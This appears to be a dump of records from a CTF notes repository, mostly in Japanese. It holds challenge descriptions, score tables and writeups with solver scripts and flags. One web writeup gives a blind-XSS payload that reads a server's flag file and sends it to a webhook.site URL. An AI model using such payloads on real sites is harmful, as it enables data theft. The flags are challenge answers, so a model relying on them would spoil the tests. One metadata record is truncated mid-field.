`n`文字目と`n+1`文字目をXORした結果が、`local_108`以降のデータ列と一致する\n\nという条件を満たすので、そのようなフラグを見つけるプログラムを作成する。\n\n```py\nfrom Crypto.Util.number import *\nimport string\n\nCHARS = string.printable\n\nlocals = [0x45481d1217111313, 0x95f422c260b4145, 0x541b56563d6c5f0b, 0x585c0b3c2945415f, 0x402a6c54095d5f00, 0x4b5f4248276a0606, 0x6c5e5d432c2d4256, 0x6b315e434707412d, 0x5e54491c6e3b0a5a, 0x2828475e05342b1a, 0x60450073b26111f, 0xa774803050b0d04]\nlocals = [ long_to_bytes(l)[::-1] for l in locals]\n\nflag = 'r'\nidx = 0\n\nfor local in locals:\n    for l in local:\n        for c in CHARS:\n            if ord(flag[idx]) ^ ord(c) == l:\n                flag += c\n                idx += 1\n                if c == '}':\n                    print(flag)\n                    exit(0)\n                break\n```\n\n<!-- rarctf{3v3ry_s1ngl3_b4by-r3v_ch4ll3ng3_u535_x0r-f0r_s0m3_r34s0n_4nd_1-d0nt_kn0w_why_dc37158365} -->\n" }, { "alpha_fraction": 0.8073394298553467, "alphanum_fraction": 0.8073394298553467, "avg_line_length": 30.285715103149414, "blob_id": "41661d11e1c9babbc6a0de835029e617e5091eb0", "content_id": "f880dfed321e4222715f4329e33e6f769753a82b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 93, "num_lines": 7, "path": "/2020/WaniCTF/exclusive/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "XORを使った暗号です🔐\n\n* [encrypt.py](https://score.wanictf.org/storage/jkbbjmmvkvidvkcvbowmxwawxcsxbumd/encrypt.py)\n\n* [output.txt](https://score.wanictf.org/storage/tukcerbgugwzbtznbhblpokjvcqzsoqt/output.txt)\n\nWriter : Laika" }, { "alpha_fraction": 0.5584239363670349, "alphanum_fraction": 0.6698369383811951, "avg_line_length": 16.355555534362793, "blob_id": "94a7f42687a37f051a255f131dc532e505168a3a", "content_id": "3cc916a5cdab3da5c8be99405f05c732b2343859", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 74, "num_lines": 45, "path": "/2021/Zh3r0_CTF_V2/bxxs/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n* http://web.zh3r0.cf:3333/feedback\n\n上記のページにアクセスする。\n\n![](img/2021-06-06-00-44-18.png)\n\n問題タイトルが`bxss`ということで、XSSを試してみる。\n\n```js\n<script>window.onload(webhookのURL);</script>\n```\n\nと入力すると、サーバーサイドでURLにアクセスしていることが分かった。\n\nまた、 \n\n* http://web.zh3r0.cf:3333/flag\n\nにアクセスすると、`Not Found`ではなく\n\n![](img/2021-06-06-00-46-50.png)\n\nと表示されることから、ローカルの`flag`を読み出せばよいことが分かる。\n\n以下のコードをFormに入力するとフラグが得られる。\n\n```js\n<script>\nvar uri = \"https://webhook.site/d709442c-232a-41d2-929d-2371e1f4d0cf/?q=\";\ntry {\n    var xhr = new XMLHttpRequest();\n    xhr.open('GET', 'flag', false);\n    xhr.send(null);\n    window.open(uri+xhr.responseText);\n} catch (e){\n    window.open(uri+e);\n}\n</script>\n```\n\n![](img/2021-06-06-00-43-31.png)\n\n<!-- zh3r0{{Ea5y_bx55_ri8}} -->\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.8376068472862244, "avg_line_length": 33.42856979370117, "blob_id": "6ac625cb09aa29189ac960acd8924527d3aaac73", "content_id": "537840961d0b3a7370e54dfd9a38f2bf29bb2b0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": "no_license", "max_line_length": 123, "num_lines": 7, "path": "/2021/redpwnCTF_2021/scissor/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I was given this string and told something about 
scissors.\n\n`egddagzp_ftue_rxms_iuft_rxms_radymf`\n\nDownloads\n\n[encrypt.py](https://static.redpwn.net/uploads/44dbfcfa8c7590e5afc686ce9d608ddf886c41ef1eee8b86a860af011dc26d73/encrypt.py)\n" }, { "alpha_fraction": 0.6526315808296204, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 26.14285659790039, "blob_id": "2f1d748b3cfda42f9c9397d8240cd3d5ab1f4847", "content_id": "4088de3c021785c3fa28e5bd096ebd63852ea3bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 190, "license_type": "no_license", "max_line_length": 89, "num_lines": 7, "path": "/2021/dCTF_2021/Bell/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Blaise's friends like triangles too!\n\n```\nnc dctf-chall-bell.westeurope.azurecontainer.io 5311\n```\n\n[bell](https://dctf.dragonsec.si/files/98bb654ba9c90d0704d5286d2fdb357b/bell?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTc4fQ.YJ-k_Q.kKR6h04g3GCM6Bt89vzBUz0R_d4)\n" }, { "alpha_fraction": 0.6349206566810608, "alphanum_fraction": 0.8015872836112976, "avg_line_length": 41, "blob_id": "e5a8e049af93c874e887dead354f823b06e134cc", "content_id": "cfa68894d58ebbf7830d5244922fdcf42eb1f01f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/2021/dCTF_2021/Dragon/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hiding in plain sight.\n\n[dragon.png](https://dctf.dragonsec.si/files/10c2091a994393f34b03c41ab4c66cbf/dragon.png?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTAwfQ.YJ9Bww.KQykU5j6RKfzVbvXVwMvvSd5jdM)\n" }, { "alpha_fraction": 0.5272727012634277, "alphanum_fraction": 0.7350649237632751, "avg_line_length": 28.69230842590332, "blob_id": "a823f66f0f570fdbe90b0f395afd4fe231f79c3a", "content_id": "e694720b43a2e602ab9c9a71535c6e7fd5ed3b9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 385, "license_type": "no_license", "max_line_length": 109, "num_lines": 13, "path": "/2020/pbctf_2020/Apoche_I/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Try hacking my old version of apoche. Here is a list of running services. 
DM an admin if none of those work:\n\n```\nhttp://34.68.159.75:37173\nhttp://34.68.159.75:41521\nhttp://34.68.159.75:39733\nhttp://34.68.159.75:55275\nhttp://34.68.159.75:52555\n```\n\nHint: There's something fishy about this apoche instance, if only there was a way to view the binary...\n\nBy: theKidOfArcrania" }, { "alpha_fraction": 0.6357142925262451, "alphanum_fraction": 0.800000011920929, "avg_line_length": 27.200000762939453, "blob_id": "b16234c710589913bcfb77fb57e7344acf528595", "content_id": "303d98192054cb0a6df4e81e5c28ac0cbb438c4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 140, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2021/UMassCTF_2021/Scan_Me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The top layer is a lie.\n\nhttp://static.ctf.umasscybersec.org/misc/8e0111c9-d8d0-4518-973d-dbdcbd9d5a42/scan_me.xcf\n\nCreated by Seltzerz#6678" }, { "alpha_fraction": 0.2890207767486572, "alphanum_fraction": 0.3471810221672058, "avg_line_length": 47.17142868041992, "blob_id": "c09654f16a78132b5c95e981a143bd3c6c019f45", "content_id": "2126ceda5d6438ad42f494e23ed8ef80114869f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1688, "license_type": "no_license", "max_line_length": 114, "num_lines": 35, "path": "/2021/angstromCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# ångstromCTF 2021\n\n* https://2021.angstromctf.com/\n\n* 2021/04/03 09:00 JST — 2021/04/08 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------------------------------- | -------------------- | ----: | -----: |\n| Misc | [Archaic](Archaic) | Linux Command | 50 | 876 |\n| Crypto | [Exclusive Cipher](Exclusive_Cipher) | XOR | 40 | 505 |\n| Misc | [Fish](Fish) | PNG alpha | 60 | 774 |\n| Crypto | [Follow_the_Currents](Follow_the_Currents) | Brute force | 70 | 272 |\n| Reversing | [FREE FLAGS!!1!!](FREE_FLAGS!!1!!) 
| | 50 | 746 |\n| Crypto | [I'm so Random](Im_so_Random) | PRNG | 100 | 240 |\n| Crypto | [Keysar v2](Keysar_v2) | Frequency Analysis | 40 | 575 |\n| Crypto | [Relatively Simple Algorithm](Relatively_Simple_Algorithm) | RSA | 40 | 730 |\n| Web | [Sea of Quills](Sea_of_Quills) | SQLite | 70 | 388 |\n| Crypto | [sosig](sosig) | RSA, Wiener's attack | 70 | 510 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 595 points\n\n* 367 / 1245 (> 1 pt)" }, { "alpha_fraction": 0.6832432150840759, "alphanum_fraction": 0.745945930480957, "avg_line_length": 23.342105865478516, "blob_id": "320b980598531d783757160090d953d6d9d9ee98", "content_id": "b54a543ae1c91221c4f3a4cfea7121fafdaa229a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1335, "license_type": "no_license", "max_line_length": 215, "num_lines": 38, "path": "/2021/WaniCTF21-spring/secret/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "この問題では Linux の ELF 実行ファイル(バイナリ)である「secret」が配布されています。\n\nこのバイナリを実行すると `secret key` を入力するように表示されます。\n\n試しに「abcde」と入力してみると「Incorrect」と言われました。\n\n```\n$ file secret\nsecret: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1daf4ab43cfa357911806c3ccae34a1b6e027913, for GNU/Linux 3.2.0, not stripped\n\n$ sudo chmod +x secret\n\n$ ./secret\n...\nInput secret key : abcde\nIncorrect\n\n$ ./secret\n...\nInput secret key : ??????\nCorrect! Flag is ??????\n```\n\nこのバイナリが正しいと判断する `secret key` を見つけて読み込んでみましょう!\n\n(`secret key` とフラグは別の文字列です)\n\n(このファイルを実行するためには Linux 環境が必要となりますので WSL や VirtualBox で用意してください)\n\nヒント :「表層解析」や「静的解析」を行うことで `secret key` が見つかるかも...?\n\n表層解析ツール [strings](https://linux.die.net/man/1/strings)\n\n静的解析ツール [Ghidra](https://ghidra-sre.org/)\n\n[rev-secret.zip](https://score.wanictf.org/storage/aguk6i4m2ri4qt46ys3oxl4s26xow2l0/rev-secret.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.28060606122016907, "alphanum_fraction": 0.3383333384990692, "avg_line_length": 133.7142791748047, "blob_id": "2fe5ea3016dd8e766cbd0bef8bf5976134e7b5fd", "content_id": "bd52ad7d4855651ff2397a5574b52c672c714c5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6601, "license_type": "no_license", "max_line_length": 161, "num_lines": 49, "path": "/2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# List of challenges\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------------------------------------ | ------------------------------------ | ----: | -----: |\n| Web | [Cyberwall](CyberSecurityRumble2020/Cyberwall) | OS Command Injection | 100 | 389 |\n| | [Wheels n Whales](CyberSecurityRumble2020/Wheels_n_Whales) | PyYAML | 100 | 94 |\n| | [Password Pandemonium](SunshineCTF/Password_Pandemonium) | javascript | 100 | 271 |\n| | [DevTools_1](WaniCTF/DevTools_1) | devtool | 100 | 163 |\n| | [DevTools_2](WaniCTF/DevTools_2) | devtool | 101 | 154 |\n| | [Simple Memo](WaniCTF/Simple_Memo) | directory traversal | 101 | 135 |\n| | [striped table](WaniCTF/striped_table) | XSS | 101 | 111 |\n| | [SQL Challenge 1](WaniCTF/SQL_Challenge_1) | SQL injection w/o spaces | 102 | 71 |\n| | [SQL Challenge 2](WaniCTF/SQL_Challenge_2) | SQL injection w/o special characters | 105 | 50 |\n| | [Apoche I](pbctf_2020/Apoche_I) | 
robots.txt, directory traversal | 52 | 52 |\n| | [Sploosh](pbctf_2020/Sploosh) | Splash, Webhook | 156 | 76 |\n| | [Lynx](kksctf_open_2020/Lynx) | Lynx, robots.txt | 204 | 113 |\n| | [What time is it now?](Harekaze_mini_CTF_2020/What_time_is_it_now) | date command | 123 | 63 |\n| Crypto | [Hashfun](CyberSecurityRumble2020/Hashfun) | XOR | 100 | 267 |\n| | [Pady McPadface](CyberSecurityRumble2020/Pady_McPadface) | Quadratic residue | 200 | 18 |\n| | [Oh_Sheet](SquareCTF2020/Oh_Sheet) | google spreadsheet | 200 | 95 |\n| | [Hash_My_Awesome_Commands](SquareCTF2020/Hash_My_Awesome_Commands) | timing attack | 150 | 51 |\n| | [Magically Delicious](SunshineCTF/Magically_Delicious) | octal | 100 | 180 |\n| | [Veni, vidi](WaniCTF/Veni_vidi) | ROT13 | 101 | 152 |\n| | [exclusive](WaniCTF/exclusive) | XOR | 101 | 96 |\n| | [Basic RSA](WaniCTF/Basic_RSA) | RSA | 102 | 76 |\n| | [LCG crack](WaniCTF/LCG_crack) | LCG | 105 | 48 |\n| | [l0g0n](WaniCTF/l0g0n) | CVE-2020-1472(Zerologon) | 111 | 33 |\n| | [Ainissesthai](pbctf_2020/Ainissesthai) | Enigma | 53 | 59 |\n| | [Queensarah2](pbctf_2020/Queensarah2) | Sarah2 Cipher | 200 | 37 |\n| | [fonction_spéciale](kksctf_open_2020/fonction_speciale) | Look(Count)-and-say sequence | 240 | 91 |\n| | [rsa](Harekaze_mini_CTF_2020/rsa) | RSA encrypt p and q | 186 | 25 |\n| Reversing | [Zeh](CyberSecurityRumble2020/Zeh) | XOR | 100 | 221 |\n| | [Welcome](HITCON_CTF_2020/Welcome) | ssh | 50 | 715 |\n| | [SSE_KEYGENME](KipodAfterFreeCTF/SSE_KEYGENME) | angr | 25 | 127 |\n| | [Hotel Door Puzzle](SunshineCTF/Hotel_Door_Puzzle) | angr | 100 | 195 |\n| Forensics | [AC1750](HITCON_CTF_2020/AC1750) | CVE-2020-10882, pcap | 168 | 100 |\n| | [logged_flag](WaniCTF/logged_flag) | key logger | 101 | 126 |\n| | [ALLIGATOR_01](WaniCTF/ALLIGATOR_01) | volatility, pstree | 102 | 83 |\n| | [ALLIGATOR_02](WaniCTF/ALLIGATOR_02) | volatility, consoles | 102 | 76 |\n| | [chunk_eater](WaniCTF/chunk_eater) | PNG chunk | 102 | 71 |\n| | [ALLIGATOR_03](WaniCTF/ALLIGATOR_03) | volatility, hashdump | 104 | 58 |\n| | [zero_size_png](WaniCTF/zero_size_png) | PNG CRC32, zlib | 107 | 40 |\n| Pwn | [speedrun-00](SunshineCTF/speedrun-00) | stack overflow | 10 | 226 |\n| Misc | [Find a Number](WaniCTF/Find_a_Number) | binary search | 101 | 111 |\n| | [MQTT Challenge](WaniCTF/MQTT_Challenge) | MQTT | 103 | 65 |\n| | [Not-stego](pbctf_2020/Not-stego) | ascii | 26 | 135 |\n| | [GCombo](pbctf_2020/GCombo) | Google Forms | 36 | 92 |\n| | [motor_sounds](kksctf_open_2020/motor_sounds) | G-code | 268 | 77 |\n| | [bson](kksctf_open_2020/bson) | MessagePack | 331 | 53 |" }, { "alpha_fraction": 0.7194244861602783, "alphanum_fraction": 0.8021582961082458, "avg_line_length": 91.66666412353516, "blob_id": "b8fb8f62514411b0fd12222f68f287a0a926a912", "content_id": "ae903fe2c5296e1cbc8b15f721138b9a4b825653", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 278, "license_type": "no_license", "max_line_length": 141, "num_lines": 3, "path": "/2021/dCTF_2021/Extraterrestrial_Communication/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Aliens have recently landed on the moon and are attempting to communicate with us. 
Can you figure out what they are trying to tell us?\n\n[A_message_from_outer_space.mp3](https://dctf.dragonsec.si/files/3e7843af95192bfa26efbd783446e724/A_message_from_outer_space.mp3?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTA0fQ.YJ-0ig.9cwFhVXn7yiIzStxznAfen208qk)\n" }, { "alpha_fraction": 0.573825478553772, "alphanum_fraction": 0.7617449760437012, "avg_line_length": 29.86206817626953, "blob_id": "ae519929ea577859eb2bda2b78ab0ec6b2c1df10", "content_id": "290be3eaf985808928a5af589d56bfe2a8241514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1102, "license_type": "no_license", "max_line_length": 254, "num_lines": 29, "path": "/2021/angstromCTF_2021/Exclusive_Cipher/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nフラグのフォーマットである`actf{`とXORをとってkeyを見つける。ただし、文字列中にフラグが埋め込まれているので、先頭文字から順番にkey候補を調べていく必要がある。\n\n```py\nfrom itertools import cycle\nimport string\n\nc = 'ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c'\nc = bytes.fromhex(c)\nm = b'actf{'\n\ndef xor(text,key):\n return bytes([a ^ b for (a,b) in zip(text, cycle(key))])\n\ndef is_ascii(text):\n return all(char in bytes(string.printable,'ascii') for char in text)\n\nwhile len(c) > len(m):\n key = xor(c,m)[:5]\n plaintext = xor(c,key)\n if is_ascii(plaintext) and b'}' in plaintext:\n print(plaintext)\n c = c[1:]\n```\n\nいくつか平文候補が見つかるが、文章として成り立っているものを選択。\n\n<!-- actf{who_needs_aes_when_you_have_xor}. Good luck on the other crypto! -->" }, { "alpha_fraction": 0.5389397740364075, "alphanum_fraction": 0.632526159286499, "avg_line_length": 22.335878372192383, "blob_id": "4c9ba071d2133629510e6ed3ea0461916f6d4d82", "content_id": "4f34904f3b723f28c2a85b3a3a8ee5dfce58f625", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3506, "license_type": "no_license", "max_line_length": 197, "num_lines": 131, "path": "/2020/CyberSecurityRumble2020/Zeh/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```c\n#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define Hauptroutine main\n#define nichts void\n#define Ganzzahl int\n#define schleife(n) for (Ganzzahl i = n; i--;)\n#define bitrverschieb(n, m) (n) >> (m)\n#define diskreteAddition(n, m) (n) ^ (m)\n#define wenn if\n#define ansonsten else\n#define Zeichen char\n#define Zeiger *\n#define Referenz &\n#define Ausgabe(s) puts(s)\n#define FormatAusgabe printf\n#define FormatEingabe scanf\n#define Zufall rand()\n#define istgleich =\n#define gleichbedeutend ==\n\nnichts Hauptroutine(nichts) {\n Ganzzahl i istgleich Zufall;\n Ganzzahl k istgleich 13;\n Ganzzahl e;\n Ganzzahl Zeiger p istgleich Referenz i;\n\n FormatAusgabe(\"%d\\n\", i);\n fflush(stdout);\n FormatEingabe(\"%d %d\", Referenz k, Referenz e);\n\n schleife(7)\n k istgleich bitrverschieb(Zeiger p, k % 3);\n\n k istgleich diskreteAddition(k, e);\n\n wenn(k gleichbedeutend 53225)\n Ausgabe(Fahne);\n ansonsten\n Ausgabe(\"War wohl nichts!\");\n}\n```\n\n`#define`によって関数名が書き換わっていて分かりづらいので元に戻してみる。\n\n```c\n#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define forloop(n) for (int i = n; i--;)\n#define rightshift(n, m) (n) >> (m)\n#define xor(n, m) (n) ^ (m)\n\nvoid 
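/* Expanded by hand from the macro version above (this comment is an added note,
   not part of the original binary). The C preprocessor never substitutes inside
   string literals, so the failure message below remains "War wohl nichts!". */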
main(void) {\n  int i = rand();\n  int k = 13;\n  int e;\n  int * p = & i;\n\n  printf(\"%d\\n\", i);\n  fflush(stdout);\n  scanf(\"%d %d\", & k, & e);\n\n  forloop(7)\n    k = rightshift(* p, k % 3);\n\n  k = xor(k, e);\n\n  if(k == 53225)\n    puts(Fahne);\n  else\n    puts(\"War wohl nichts!\");\n}\n```\n\n処理の流れは以下の通り。\n\n1. ![i](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+i) をprintf\n\n1. ![e,k](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+e%2Ck) を入力\n\n1. ![k = (*p) \\gg (k \\mod 3)](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+k+%3D+%28%2Ap%29+%5Cgg+%28k+%5Cmod+3%29) を7回\n\n1. ![53225 = k \\oplus e](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+53225+%3D+k+%5Coplus+e)\n\n`nc`してみると常に`1804289383`が返ってくるので`i`は固定っぽい。\n\n```bash\n$ nc chal.cybersecurityrumble.de 65123\n1804289383\n```\n\n最終的に k = 53225 になるように逆算していけば良さそう。\n\n(3)式で、何回ループを回しても *p 自体は変化しないので、k は *p を 0,1,2右シフトした3通りのパターンのいずれかになる。\n\n| シフト | *p |\n| --- | ---------- |\n| 0 | 1804289383 |\n| 1 | 902144691 |\n| 2 | 451072345 |\n\nそして、それぞれに対して k = 53225 となる e を計算すると次のようになる。\n\n![*p \\oplus e =53225 \\Leftrightarrow e = *p \\oplus 53225](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+%2Ap+%5Coplus+e+%3D53225+%5CLeftrightarrow+e+%3D+%2Ap+%5Coplus+53225)\n\n* [競技プログラミングにおけるXORのTips](https://qiita.com/kuuso1/items/778acaa7011d98a3ff3a)\n\n\n| シフト | *p | e |\n| --- | ---------- | ---------- |\n| 0 | 1804289383 | 1804307086 |\n| 1 | 902144691 | 902131034 |\n| 2 | 451072345 | 451026608 |\n\nよって、`0 1804307086`, `0 902131034`, `0 451026608`のいずれかは k = 53225 になるはずである。\n\n```bash\n$ nc chal.cybersecurityrumble.de 65123 \n1804289383 \n0 1804307086 \n```\n\n<!-- CSR{RUECKWARTSINGENEUREN} -->" }, { "alpha_fraction": 0.6450381875038147, "alphanum_fraction": 0.7748091816902161, "avg_line_length": 31.875, "blob_id": "c4c850cc8dea259ac84399fab236ec53b9c8cf34", "content_id": "93946de673393ecd3e939893a36273e3b88c5635", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 262, "license_type": "no_license", "max_line_length": 118, "num_lines": 8, "path": "/2020/hxp_CTF_2020/nanothorpe/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Description:\nWelcome back to ls-as-a-service, the most useful tool on the internet!\n\nDownload:\n[nanothorpe-d2095dcfeda4b08d.tar.xz (13.3 KiB)](https://2020.ctf.link/assets/files/nanothorpe-d2095dcfeda4b08d.tar.xz)\n\nConnection (mirrors):\nhttp://157.90.22.14:8832/" }, { "alpha_fraction": 0.6751739978790283, "alphanum_fraction": 0.7208043336868286, "avg_line_length": 28.976743698120117, "blob_id": "9bec45cb05fd50689678242cd813beee7e4d6980", "content_id": "a0c712bd8d7ad41074c6" }, { "alpha_fraction": 0.6836734414100647, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 31.75, "blob_id": "2b007118128ffc1d7cdf819faf6a80faaa9deb39", "content_id": "4192a66efec1e7fb707fcff81c501cfaa0db6968", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1391, "license_type": "no_license", "max_line_length": 224, "num_lines": 43, "path": "/2020/SunshineCTF/Hotel_Door_Puzzle/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`file`コマンドでファイルの形式を調べる。\n\n```bash\n$ file hotel_key_puzzle \nhotel_key_puzzle: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c4add21a28170d0828bedc432f1ed178007be0d0, for GNU/Linux 3.2.0, not stripped\n```\n\n実行してみる。\n\n```bash\n$ ./hotel_key_puzzle \nHotel Orlando Door Puzzle v1\n----------------------------\nThis puzzle, 
provided by Hotel Orlando, is in place to give the bellhops enough time to get your luggage to you.\nWe have really slow bellhops and so we had to put a serious _time sink_ in front of you.\nHave fun with this puzzle while we get your luggage to you!\n\n\t-Hotel Orlando Bellhop and Stalling Service\n\nYour guess, if you would be so kind: \nhoge\nSadly, that is the incorrect key. If you would like, you could also sit in our lobby and wait.\n```\n\n正しいkeyを入力すれば良さそうなので、angrを使って調べる。\n\n```py\nimport angr\n\np = angr.Project('hotel_key_puzzle')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0x22BA-0x221B)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))\n```\n\n<!-- sun{b3llh0p5-runn1n6-qu1ckly} -->\n\n\n\n\n" }, { "alpha_fraction": 0.7057142853736877, "alphanum_fraction": 0.7342857122421265, "avg_line_length": 17.473684310913086, "blob_id": "6618a16ae0f89926cf47a6c0bfb4b5e2c7e17ab6", "content_id": "991009d8d8394e1e8d8592be28d04e3f04ce980d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 350, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/2021/BCACTF_2.0/Storytime_The_Opening_Gambit/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gather around, it's time for a story! I've even included a reward at the end!\n\n[story](https://objects.bcactf.com/bcactf2/storytime-1/story)\n\nHint 1 of 4\n\nI don't think that's the whole story.\n\nHint 2 of 4\n\nHow can you look into a compiled executable file?\n\nHint 3 of 4\n\nMaybe a command line tool will help?\n\nHint 4 of 4\n\nWhat can you make with wool?" }, { "alpha_fraction": 0.603210985660553, "alphanum_fraction": 0.7201834917068481, "avg_line_length": 18, "blob_id": "98a08f4aac84fab216ccca7c165481fcb1204da6", "content_id": "9742ffd8bd0e435cf352dee259f454ee3a22f35d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 676, "license_type": "no_license", "max_line_length": 64, "num_lines": 23, "path": "/2020/WaniCTF/MQTT_Challenge/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nサブスクライブした topic の内容を表示する仕組みになっている。\n\n![](img/2020-11-22-12-56-09.png)\n\nさすがに `nkt/flag` ではダメだった。\n\n![](img/2020-11-22-12-57-17.png)\n\nすべてをサブスクライブに指定したいので、MQTTのワイルドカードについて調べると、`#`を使えばよいことが分かった。\n\n[参考]\n\n* http://devcenter.magellanic-clouds.com/learning/mqtt-spec.html\n\n`#`をサブスクライブするとフラグが取得できた。\n\n`top/secret/himitu/daiji/mitara/dame/zettai/flag` にあるらしい。\n\n![](img/2020-11-22-13-06-22.png)\n\n<!-- FLAG{mq77_w1ld_c4rd!!!!_af5e29cb23} -->" }, { "alpha_fraction": 0.7315436005592346, "alphanum_fraction": 0.7852349281311035, "avg_line_length": 39.727272033691406, "blob_id": "aff31ba96c72f26c5c30b67457151e2b7d500d43", "content_id": "a55b82efe5339dbe5b5096c8293c836d028e83da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 447, "license_type": "no_license", "max_line_length": 143, "num_lines": 11, "path": "/2021/UMassCTF_2021/notes/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The breach seems to have originated from this host. Can you find the user's mistake? 
Here is a memory image of their workstation from that day.\n\nhttp://static.ctf.umasscybersec.org/forensics/13096721-bb26-4b79-956f-3f0cddebd49b/image.mem\n\nCreated by [breeze]#3600\n\n<details><summary>View Hint</summary>\n\nThere wasn't any suspicious network activity or anything... it's almost as if they just had their passwords up right on the screen.\n\n</details>" }, { "alpha_fraction": 0.5063291192054749, "alphanum_fraction": 0.6708860993385315, "avg_line_length": 15, "blob_id": "87158dae420c13e446cf64403648ba7bf8e1d9db", "content_id": "235dbbc5afc204c9a79034c047f0095046fd90c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/1597/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "... as in https://xkcd.com/1597/\n\nhttp://git.ritsec.club:7000/1597.git/\n\n~knif3" }, { "alpha_fraction": 0.7010869383811951, "alphanum_fraction": 0.7880434989929199, "avg_line_length": 19.44444465637207, "blob_id": "86e9275083f7c478d28c2d1672eb8354948879a9", "content_id": "a6dd75d061c6b82fb1e079a973c458db88b9031c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 196, "license_type": "no_license", "max_line_length": 95, "num_lines": 9, "path": "/2021/WaniCTF21-spring/OUCS/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "OUによるHomomorphicなCryptoSystemです\n\n```\nnc oucs.cry.wanictf.org 